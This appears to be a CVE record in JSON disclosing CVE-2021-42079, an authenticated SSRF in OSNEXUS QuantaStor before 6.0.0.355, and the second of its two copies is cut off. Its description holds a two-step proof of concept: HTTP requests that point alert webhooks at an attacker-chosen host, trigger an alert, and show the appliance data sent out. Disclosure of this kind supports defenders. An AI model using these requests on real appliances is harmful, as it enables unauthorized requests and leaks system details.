{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"cveId": "CVE-2021-42079", "assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217", "state": "PUBLISHED", "assignerShortName": "DIVD", "dateReserved": "2021-10-07T17:12:57.677Z", "datePublished": "2023-07-10T06:29:48.339Z", "dateUpdated": "2025-09-22T06:40:03.059Z"}, "containers": {"cna": {"affected": [{"collectionURL": "https://www.osnexus.com/downloads", "defaultStatus": "unknown", "platforms": ["Windows", "Linux"], "product": "QuantaStor", "vendor": "OSNEXUS", "versions": [{"lessThan": "6.0.0.355", "status": "affected", "version": "0", "versionType": "semver"}]}], "credits": [{"lang": "en", "type": "finder", "value": "Wietse Boonstra (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Frank Breedijk (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Victor Pasman (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Victor Gevers (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Max van der Horst (DIVD)"}, {"lang": "en", "type": "analyst", "value": "C\u00e9listine Oosting (DIVD)"}], "descriptions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br><br>POC<br><br>Step 1: Prepare the SSRF with a request like this:<br><br><tt><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertConfigSet?senderEmailAddress=a&amp;smtpServerIpAddress=BURPCOLLABHOST&amp;smtpServerPort=25&amp;smtpUsername=a&amp;smtpPassword=1&amp;smtpAuthType=1&amp;customerSupportEmailAddress=1&amp;poolFreeSpaceWarningThreshold=1&amp;poolFreeSpaceAlertThreshold=1&amp;poolFreeSpaceCriticalAlertThreshold=1&amp;pagerDutyServiceKey=1&amp;slackWebhookUrl=</span>http://&lt;target&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">&amp;enableAlertTypes&amp;enableAlertTypes=1&amp;disableAlertTypes=1&amp;pauseAlertTypes=1&amp;mattermostWebhookUrl=</span>http://&lt;TARGET&gt;<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\nAccept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br>\nConnection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 0</span></tt><br><tt><br>Step 2: Trigger this alert with this request<br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertRaise?title=test&amp;message=test&amp;severity=1 <br>HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\n<br>Accept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n<br>Connection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 1<br><br></span></tt>The post request received by &lt;TARGET&gt; looks like this:<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">{<br>\u2003\n### Python FLASK stuff ####\n<br>\u2003'endpoint': 'index', <br>\u2003\n'method': 'POST', <br>\u2003\n'cookies': ImmutableMultiDict([]), <br>\u2003\n### END Python FLASK stuff ####\n<br>\u2003\n'data': b'{ <br>\u2003\u2003\"attachments\": [ <br>\u2003\u2003\u2003{\n<br>\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n<br>\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n<br>\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n<br>\u2003\u2003\u2003\u2003\"text\": \"test\",\n<br>\u2003\u2003\u2003\u2003\"fields\": [ &nbsp; <br>\u2003\u2003\u2003\u2003\u2003{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n &nbsp; &nbsp;<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n &nbsp; &nbsp;<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false &nbsp;<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", &nbsp; &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (</span>https://&lt;HOSTNAME&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">)\",\n &nbsp; &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug &nbsp;6 16-02-55 2021\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003 }, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003},<br>\u2003\u2003\u2003\u2003],\n<br>\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n<br>\u2003\u2003\u2003\u2003\"footer_icon\": \"</span><a target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\">https://platform.slack-edge.com/img/default_application_icon.png</a><span style=\"background-color: rgba(29, 28, 29, 0.04);\">\",\n<br>\u2003\u2003\u2003\u2003\"ts\": 1628461774<br>\u2003\u2003\u2003}<br>\u2003\u2003], <br>\u2003\u2003\"mrkdwn\":true <br>\u2003}', <br>\u2003#### FLASK REQUEST STUFF #####\n<br>\u2003'headers': {\n<br>\u2003\u2003'Host': '&lt;redacted&gt;', <br>\u2003\u2003'User-Agent': 'curl/7.58.0', <br>\u2003\u2003'Accept': '*/*', <br>\u2003\u2003'Content-Type': 'application/json', <br>\u2003\u2003'Content-Length': '790'\n<br>\u2003}, <br>\u2003'args': ImmutableMultiDict([]), <br>\u2003'form': ImmutableMultiDict([]), <br>\u2003'remote_addr': '217.103.63.173', <br>\u2003'path': '/payload/58', <br>\u2003'whois_ip': 'TNF-AS, NL'<br>}\n<br>#### END FLASK REQUEST STUFF #####</span><tt></tt>"}], "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>\nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by <TARGET> looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003'endpoint': 'index', \n\u2003\n'method': 'POST', \n\u2003\n'cookies': ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n'data': b'{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://<HOSTNAME>)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}', \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003'headers': {\n\n\u2003\u2003'Host': '<redacted>', \n\u2003\u2003'User-Agent': 'curl/7.58.0', \n\u2003\u2003'Accept': '*/*', \n\u2003\u2003'Content-Type': 'application/json', \n\u2003\u2003'Content-Length': '790'\n\n\u2003}, \n\u2003'args': ImmutableMultiDict([]), \n\u2003'form': ImmutableMultiDict([]), \n\u2003'remote_addr': '217.103.63.173', \n\u2003'path': '/payload/58', \n\u2003'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####"}], "metrics": [{"cvssV3_1": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "version": "3.1"}, "format": "CVSS", "scenarios": [{"lang": "en", "value": "GENERAL"}]}], "problemTypes": [{"descriptions": [{"cweId": "CWE-918", "description": "CWE-918 Server-Side Request Forgery (SSRF)", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217", "shortName": "DIVD", "dateUpdated": "2025-09-22T06:40:03.059Z"}, "references": [{"tags": ["third-party-advisory", "technical-description"], "url": "https://www.wbsec.nl/osnexus"}, {"tags": ["third-party-advisory", "exploit", "technical-description"], "url": "https://cisrt.divd.nl/DIVD-2021-00020/"}, {"tags": ["product"], "url": "https://www.osnexus.com/products/software-defined-storage"}, {"tags": ["third-party-advisory"], "url": "https://csirt.divd.nl/CVE-2021-42079"}], "solutions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "Upgrade to the latest version of OSNEXUS QuantaStor."}], "value": "Upgrade to the latest version of OSNEXUS QuantaStor."}], "source": {"discovery": "INTERNAL"}, "title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355", "x_generator": {"engine": "Vulnogram 0.1.0-dev"}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-04T03:22:25.855Z"}, "title": "CVE Program Container", "references": [{"url": "https://www.wbsec.nl/osnexus", "tags": ["third-party-advisory", "x_transferred"]}, {"url": "https://www.divd.nl/DIVD-2021-00020", "tags": ["third-party-advisory", "x_transferred"]}, {"url": "https://www.osnexus.com/products/software-defined-storage", "tags": ["product", "x_transferred"]}, {"url": "https://csirt.divd.nl/CVE-2021-42079", "tags": ["third-party-advisory", "x_transferred"]}]}, {"metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2024-11-04T20:06:08.530050Z", "id": "CVE-2021-42079", "options": [{"Exploitation": "none"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2024-11-04T20:06:17.817Z"}}]}}

{"dataType": "CVE_RECORD", "containers": {"adp": [{"title": "CVE Program Container", "references": [{"url": "https://www.wbsec.nl/osnexus", "tags": ["third-party-advisory", "x_transferred"]}, {"url": "https://www.divd.nl/DIVD-2021-00020", "tags": ["third-party-advisory", "x_transferred"]}, {"url": "https://www.osnexus.com/products/software-defined-storage", "tags": ["product", "x_transferred"]}, {"url": "https://csirt.divd.nl/CVE-2021-42079", "tags": ["third-party-advisory", "x_transferred"]}], "providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-04T03:22:25.855Z"}}, {"title": "CISA ADP Vulnrichment", "metrics": [{"other": {"type": "ssvc", "content": {"id": "CVE-2021-42079", "role": "CISA Coordinator", "options": [{"Exploitation": "none"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "version": "2.0.3", "timestamp": "2024-11-04T20:06:08.530050Z"}}}], "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2024-11-04T20:06:13.510Z"}}], "cna": {"title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355", "source": {"discovery": "INTERNAL"}, "credits": [{"lang": "en", "type": "finder", "value": "Wietse Boonstra (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Frank Breedijk (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Victor Pasman (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Victor Gevers (DIVD)"}, {"lang": "en", "type": "analyst", "value": "Max van der Horst (DIVD)"}, {"lang": "en", "type": "analyst", "value": "C\u00e9listine Oosting (DIVD)"}], "metrics": [{"format": "CVSS", "cvssV3_1": {"scope": "CHANGED", "version": "3.1", "baseScore": 6.2, "attackVector": "NETWORK", "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "integrityImpact": "NONE", "userInteraction": "REQUIRED", "attackComplexity": "LOW", "availabilityImpact": "NONE", "privilegesRequired": "HIGH", "confidentialityImpact": "HIGH"}, "scenarios": [{"lang": "en", "value": "GENERAL"}]}], "affected": [{"vendor": "OSNEXUS", "product": "QuantaStor", "versions": [{"status": "affected", "version": "0", "lessThan": "6.0.0.355", "versionType": "semver"}], "platforms": ["Windows", "Linux"], "collectionURL": "https://www.osnexus.com/downloads", "defaultStatus": "unknown"}], "solutions": [{"lang": "en", "value": "Upgrade to the latest version of OSNEXUS QuantaStor.", "supportingMedia": [{"type": "text/html", "value": "Upgrade to the latest version of OSNEXUS QuantaStor.", "base64": false}]}], "references": [{"url": "https://www.wbsec.nl/osnexus", "tags": ["third-party-advisory", "technical-description"]}, {"url": "https://cisrt.divd.nl/DIVD-2021-00020/", "tags": ["third-party-advisory", "exploit", "technical-description"]}, {"url": "https://www.osnexus.com/products/software-defined-storage", "tags": ["product"]}, {"url": "https://csirt.divd.nl/CVE-2021-42079", "tags": ["third-party-advisory"]}], "x_generator": {"engine": "Vulnogram 0.1.0-dev"}, "descriptions": [{"lang": "en", "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>\nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: <HOSTNAME> \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic <BASIC_AUTH_HASH> \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by <TARGET> looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003'endpoint': 'index', \n\u2003\n'method': 'POST', \n\u2003\n'cookies': ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n'data': b'{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://<HOSTNAME>)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}', \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003'headers': {\n\n\u2003\u2003'Host': '<redacted>', \n\u2003\u2003'User-Agent': 'curl/7.58.0', \n\u2003\u2003'Accept': '*/*', \n\u2003\u2003'Content-Type': 'application/json', \n\u2003\u2003'Content-Length': '790'\n\n\u2003}, \n\u2003'args': ImmutableMultiDict([]), \n\u2003'form': ImmutableMultiDict([]), \n\u2003'remote_addr': '217.103.63.173', \n\u2003'path': '/payload/58', \n\u2003'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####", "supportingMedia": [{"type": "text/html", "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br><br>POC<br><br>Step 1: Prepare the SSRF with a request like this:<br><br><tt><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertConfigSet?senderEmailAddress=a&amp;smtpServerIpAddress=BURPCOLLABHOST&amp;smtpServerPort=25&amp;smtpUsername=a&amp;smtpPassword=1&amp;smtpAuthType=1&amp;customerSupportEmailAddress=1&amp;poolFreeSpaceWarningThreshold=1&amp;poolFreeSpaceAlertThreshold=1&amp;poolFreeSpaceCriticalAlertThreshold=1&amp;pagerDutyServiceKey=1&amp;slackWebhookUrl=</span>http://&lt;target&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">&amp;enableAlertTypes&amp;enableAlertTypes=1&amp;disableAlertTypes=1&amp;pauseAlertTypes=1&amp;mattermostWebhookUrl=</span>http://&lt;TARGET&gt;<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\nAccept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br>\nConnection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 0</span></tt><br><tt><br>Step 2: Trigger this alert with this request<br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">GET /qstorapi/alertRaise?title=test&amp;message=test&amp;severity=1 <br>HTTP/1.1\n<br>Host: &lt;HOSTNAME&gt; <br>Accept-Encoding: gzip, deflate\n<br>Accept: */*\n<br>Accept-Language: en\n<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n<br>Connection: close\n<br>authorization: Basic &lt;BASIC_AUTH_HASH&gt; <br>Content-Type: application/json\n<br>Content-Length: 1<br><br></span></tt>The post request received by &lt;TARGET&gt; looks like this:<br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">{<br>\u2003\n### Python FLASK stuff ####\n<br>\u2003'endpoint': 'index', <br>\u2003\n'method': 'POST', <br>\u2003\n'cookies': ImmutableMultiDict([]), <br>\u2003\n### END Python FLASK stuff ####\n<br>\u2003\n'data': b'{ <br>\u2003\u2003\"attachments\": [ <br>\u2003\u2003\u2003{\n<br>\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n<br>\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n<br>\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n<br>\u2003\u2003\u2003\u2003\"text\": \"test\",\n<br>\u2003\u2003\u2003\u2003\"fields\": [ &nbsp; <br>\u2003\u2003\u2003\u2003\u2003{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n &nbsp; &nbsp;<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n &nbsp; &nbsp;<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false &nbsp;<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", &nbsp; &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (</span>https://&lt;HOSTNAME&gt;<span style=\"background-color: rgba(29, 28, 29, 0.04);\">)\",\n &nbsp; &nbsp; <br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003}, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug &nbsp;6 16-02-55 2021\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003 }, &nbsp;{ &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", &nbsp; &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true &nbsp;\n<br>\u2003\u2003\u2003\u2003\u2003},<br>\u2003\u2003\u2003\u2003],\n<br>\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n<br>\u2003\u2003\u2003\u2003\"footer_icon\": \"</span><a target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\">https://platform.slack-edge.com/img/default_application_icon.png</a><span style=\"background-color: rgba(29, 28, 29, 0.04);\">\",\n<br>\u2003\u2003\u2003\u2003\"ts\": 1628461774<br>\u2003\u2003\u2003}<br>\u2003\u2003], <br>\u2003\u2003\"mrkdwn\":true <br>\u2003}', <br>\u2003#### FLASK REQUEST STUFF #####\n<br>\u2003'headers': {\n<br>\u2003\u2003'Host': '&lt;redacted&gt;', <br>\u2003\u2003'User-Agent': 